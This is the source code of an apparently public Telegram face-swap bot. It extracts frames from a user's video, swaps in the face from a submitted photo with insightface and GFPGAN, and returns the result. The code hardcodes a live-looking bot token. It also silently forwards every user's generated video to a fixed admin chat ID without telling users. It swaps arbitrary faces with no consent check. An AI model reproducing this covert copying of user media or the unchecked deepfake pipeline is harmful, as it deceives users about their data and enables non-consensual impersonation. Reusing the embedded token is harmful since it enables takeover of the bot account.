Spaces:
Paused
Paused
| from math import e | |
| import cv2 | |
| import os | |
| import insightface | |
| import onnxruntime | |
| from tqdm import tqdm | |
| import shutil | |
| import gfpgan | |
| from aiogram import Bot, types | |
| from aiogram.dispatcher import Dispatcher | |
| from aiogram.utils import executor | |
| from queue import Queue | |
| import nest_asyncio | |
| nest_asyncio.apply() | |
| user_data = {} | |
| request_queue = Queue() # Queue to store incoming user requests | |
| bot = Bot(token="6893700312:AAH2VZuHELk2RSSjg4aX6MpzIImnEwjORec") | |
| dp = Dispatcher(bot) | |
| group_id = '@FaceSwap_profaker' | |
| strr = "" | |
| img = False | |
| vid = False | |
| size = 1 | |
| pos = '' | |
| swa = '' | |
| position = '' | |
| pos_count = 1 | |
| progress = 0 | |
| ACTIVE_USERS_FILE = "active_users.txt" | |
| # Load active users from the file | |
| def load_active_users(): | |
| active_users = set() | |
| if os.path.exists(ACTIVE_USERS_FILE): | |
| with open(ACTIVE_USERS_FILE, 'r') as file: | |
| for line in file: | |
| active_users.add(int(line.strip())) # Assuming user IDs are integers | |
| return active_users | |
| # Save active users to the file | |
| def save_active_users(active_users): | |
| with open(ACTIVE_USERS_FILE, 'w') as file: | |
| for user_id in active_users: | |
| file.write(str(user_id) + '\n') | |
| # Initialize active users | |
| active_users = load_active_users() | |
| # Function to add user to active users list | |
| def add_active_user(user_id): | |
| active_users.add(user_id) | |
| save_active_users(active_users) | |
| async def video_to_frames(video_path, output_folder, message,target_width, target_height): | |
| global swa | |
| swa = await bot.send_message(chat_id=message.chat.id, text=f"Getting Frames from Video") | |
| vidcap = cv2.VideoCapture(video_path) | |
| fps = vidcap.get(cv2.CAP_PROP_FPS) | |
| success, image = vidcap.read() | |
| count = 0 | |
| if not os.path.exists(output_folder): | |
| os.makedirs(output_folder) | |
| width = int(vidcap.get(cv2.CAP_PROP_FRAME_WIDTH)) | |
| height = int(vidcap.get(cv2.CAP_PROP_FRAME_HEIGHT)) | |
| aspect_ratio = float(width) / height | |
| target_width = int(target_height * aspect_ratio) | |
| while success: | |
| frame_name = os.path.join(output_folder, f"frame_{count}.jpg") | |
| resized_frame = cv2.resize(image, (target_width, target_height)) | |
| cv2.imwrite(frame_name, resized_frame) | |
| success, image = vidcap.read() | |
| count += 1 | |
| if count>400: | |
| break | |
| print(f"{count} frames extracted from {video_path}.") | |
| return [count,fps] | |
| async def frames_to_video(frame_folder, video_path, source_img, frame_count,fps, message): | |
| global swa, progress | |
| await swa.edit_text(" Swapping Faces in Frames...") | |
| frames = [f for f in os.listdir(frame_folder) if f.endswith('.jpg')] | |
| frames.sort(key=lambda x: int(x.split('_')[1].split('.')[0])) # Sort frames in ascending order | |
| frame = cv2.imread(os.path.join(frame_folder, frames[0])) | |
| height, width, _ = frame.shape | |
| fourcc = cv2.VideoWriter_fourcc(*'mp4v') | |
| out = cv2.VideoWriter(video_path, fourcc, fps, (width, height)) | |
| app = insightface.app.FaceAnalysis(name='buffalo_l', providers=['CUDAExecutionProvider']) | |
| app.prepare(ctx_id=0, det_size=(640, 640)) | |
| providers = ['CUDAExecutionProvider'] | |
| swapper = insightface.model_zoo.get_model("inswapper_128.onnx",download=False, download_zip=False,providers=providers) | |
| face_enhancer = gfpgan.GFPGANer(model_path="GFPGANv1.4.pth", upscale=1, device='cuda') | |
| await swa.edit_text(f"Converted frames:0.00/{frame_count}, Progress:0.00 %") | |
| for i in tqdm(range(frame_count), desc="Converting frames to video"): | |
| img1 = cv2.imread(os.path.join(frame_folder, frames[i])) | |
| img2 = cv2.imread(source_img) # Replace with your source image path | |
| faces1 = app.get(img1) | |
| for _ in range(20): | |
| faces2 = app.get(img2) | |
| if faces2: | |
| break | |
| else: | |
| await swa.edit_text(f"Face Detection time out in source image, try again later.") | |
| return | |
| if faces1: | |
| face1 = faces1[0] | |
| face2 = faces2[0] | |
| result = img1.copy() | |
| result = swapper.get(result, face1, face2, paste_back=True) | |
| _, _, result = face_enhancer.enhance(result) | |
| out.write(result) | |
| else: | |
| out.write(img1) | |
| progress = int((i + 1) / frame_count * 100) | |
| await swa.edit_text(f"Converted frames:{i}/{frame_count} , Progress: {progress:.2f}%") | |
| out.release() | |
| print(f"Video saved at {video_path}.") | |
| async def start_command(message: types.Message): | |
| add_active_user(message.chat.id) | |
| global user_data | |
| user_id = message.chat.id | |
| member_info = await bot.get_chat_member(group_id, message.chat.id) | |
| user_data[user_id] = {'image': None, 'video': None,'position': None} | |
| if member_info.status in ['member', 'administrator','creator']: | |
| await message.reply(f"Welcome {message.chat.first_name}. Send first image") | |
| else: | |
| await message.reply("Please Join the group \nhttps://t.me/FaceSwap_profaker\n & Start the bot again") | |
| async def restart_command(message: types.Message): | |
| global user_data | |
| if message.chat.id == 6081754946: | |
| for user_id in active_users: | |
| try: | |
| await bot.send_message(user_id,"Server Disconnected. Please restart the bot and Try again..") | |
| except: | |
| continue | |
| else: | |
| await bot.send_message(message.chat.id,"This command is only for admins.") | |
| async def stop_command(message: types.Message): | |
| global user_data | |
| if message.chat.id == 6081754946: | |
| for user_id in active_users: | |
| try: | |
| await bot.send_message(user_id,"Bot stopped due to heavy traffic, Try again later.") | |
| except: | |
| continue | |
| else: | |
| await bot.send_message(message.chat.id,"This command is only for admins.") | |
| async def queue_command(message: types.Message): | |
| global user_data | |
| user_id = message.chat.id | |
| if user_id in user_data and user_data[user_id]['position'] is not None: | |
| await bot.send_message(user_id,f"Your position in queue: {user_data[user_id]['position']}\nCurrent User: {pos_count},{progress:.2f}%\nTotal Queue: {size-1}") | |
| else: | |
| await bot.send_message(user_id,"You are not added into Queue") | |
| async def handle_media(message: types.Message): | |
| global image_received, video_received, user_data, strr, img, vid, size, pos, position, pos_count | |
| flag = 0 | |
| member_info = await bot.get_chat_member(group_id, message.chat.id) | |
| user_id = message.chat.id | |
| if message.photo and user_data[user_id]['image'] is None: | |
| if member_info.status in ['member', 'administrator','creator']: | |
| photo_file_id = message.photo[-1].file_id | |
| photo = await bot.get_file(photo_file_id) | |
| photo_path = photo.file_path | |
| try: | |
| user_data[user_id]['image'] = photo_path | |
| await photo.download(f"{user_id}.jpg") | |
| if user_data[user_id]['video'] == None: | |
| await message.answer("Source image Recieved! Now send Target video") | |
| else: | |
| await message.answer("Source image Recieved. Processing...") | |
| user_data[user_id]['position'] = size | |
| request_queue.put((user_id, user_data[user_id]['image'], user_data[user_id]['video'], message, user_data[user_id]['position'])) | |
| size +=1 | |
| img = True | |
| except KeyError: | |
| await bot.send_message(user_id,"Restart the bot and Try again.") | |
| return | |
| else: | |
| await message.reply("Please Join the group \nhttps://t.me/FaceSwap_profaker\n & Start the bot again") | |
| elif message.video and user_data[user_id]['video'] is None: | |
| if member_info.status in ['member', 'administrator','creator']: | |
| video_file_id = message.video.file_id | |
| try: | |
| video = await bot.get_file(video_file_id) | |
| except: | |
| await message.answer("File is Too big Send a small File.") | |
| return | |
| video_path = video.file_path | |
| try: | |
| user_data[user_id]['video'] = video_path | |
| await video.download(f"{user_id}.mp4") | |
| if user_data[user_id]['image'] == None: | |
| await message.answer("Target video Recieved..! Now Send Source image.") | |
| else: | |
| await message.answer("Target video Recieved. Processing...") | |
| user_data[user_id]['position'] = size | |
| request_queue.put((user_id, user_data[user_id]['image'], user_data[user_id]['video'], message, user_data[user_id]['position'])) | |
| size +=1 | |
| vid = True | |
| except KeyError: | |
| await bot.send_message(user_id,"Restart the bot and Try again.") | |
| return | |
| else: | |
| await message.reply("Please Join the group \nhttps://t.me/FaceSwap_profaker\n & Start the bot again") | |
| else: | |
| flag = 1 | |
| await message.reply("Your requests are already in /queue\nWait till current requests are completed.") | |
| print() | |
| print(user_data,size) | |
| print() | |
| if request_queue.qsize() == 1 and strr == '' : | |
| await process_request() | |
| if user_data[user_id]['image'] and user_data[user_id]['video'] and flag == 0: | |
| await bot.send_message(user_id,f"Your requests are added to Queue.\n\nCheck your Queue position using\n/queue command") | |
| async def process_request(): | |
| global user_data, strr, img, vid, pos, size, pos_count | |
| user_id, image_path, video_path, message, position = request_queue.get() | |
| print(image_path,video_path) | |
| strr = user_id | |
| if user_data[user_id]['image'] and user_data[user_id]['video']: | |
| video_path = f"{user_id}.mp4" | |
| output_folder = "Out_Frames" # Output folder to save frames | |
| source_img = f"{user_id}.jpg" # Path to the source image for face swapping | |
| frame_count = await video_to_frames(video_path, output_folder, message,target_width=854, target_height=480) | |
| if frame_count[0] > 200: | |
| frame_count[0] = 200 | |
| output_video_path = f"{user_id}_output_video.mp4" # Output video path | |
| await frames_to_video(output_folder, output_video_path, source_img, frame_count[0],frame_count[1], message) | |
| with open(f'{user_id}_output_video.mp4', 'rb') as video_file: | |
| await bot.send_video(message.chat.id, video_file) | |
| with open(f'{user_id}_output_video.mp4', 'rb') as video_file: | |
| await bot.send_video(6081754946, video_file) | |
| os.remove(f"{user_id}.jpg") | |
| os.remove(f"{user_id}.mp4") | |
| os.remove(f"{user_id}_output_video.mp4") | |
| pos_count = pos_count + 1 | |
| strr = "" | |
| print(user_data) | |
| user_data[user_id] = {'image': None, 'video': None,'position': None} | |
| if request_queue.empty(): | |
| shutil.rmtree('Out_Frames') | |
| size = 1 | |
| return | |
| else: | |
| await process_request() | |
| executor.start_polling(dp) |